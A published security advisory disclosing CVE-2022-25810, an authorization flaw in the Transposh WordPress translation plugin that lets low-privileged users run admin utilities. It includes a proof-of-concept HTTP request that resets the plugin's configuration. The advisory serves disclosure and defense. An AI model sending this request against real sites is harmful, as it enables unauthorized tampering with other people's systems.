RCE Security Advisory
https://www.rcesecurity.com


1. ADVISORY INFORMATION
=======================
Product:        Transposh WordPress Translation
Vendor URL:     https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/
Type:           Improper Authorization [CWE-285]
Date found:     2022-02-21
Date published: 2022-07-22
CVSSv3 Score:   6.3 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)
CVE:            CVE-2022-25810


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
Transposh WordPress Translation 1.0.8.1 and below


4. INTRODUCTION
===============
Transposh translation filter for WordPress offers a unique approach to blog
translation. It allows your blog to combine automatic translation with human
translation aided by your users with an easy to use in-context interface.

(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
Transposh does not properly enforce authorization on functionalities available on
the plugin's "Utilities" page leading to unauthorized access for all user roles,
including "Subscriber".

Some of the affected functionality is:
tp_backup - Initiate a new backup
tp_reset - Reset the plugin's configuration
tp_cleanup - Delete automated translations
tp_dedup - Delete duplicates
tp_maint - Fix internal errors
tp_translate_all - Trigger an auto-translation of all entries


6. PROOF OF CONCEPT
===================
An exemplary request to reset the plugin's configuration, send the following
request using a "Subscriber" account:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 15
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your cookies]
Connection: close

action=tp_reset


7. SOLUTION
===========
None. Remove the plugin to prevent exploitation.


8. REPORT TIMELINE
==================
2022-02-21: Discovery of the vulnerability
2022-02-21: Contacted the vendor via email
2022-02-21: Vendor response
2022-02-22: CVE requested from WPScan (CNA)
2022-02-23: WPScan assigns CVE-2022-25810
2022-05-22: Sent request for status update on the fix
2022-05-24: Vendor states that there is no update planned so far
2022-07-22: Public disclosure


9. REFERENCES
=============
https://github.com/MrTuxracer/advisories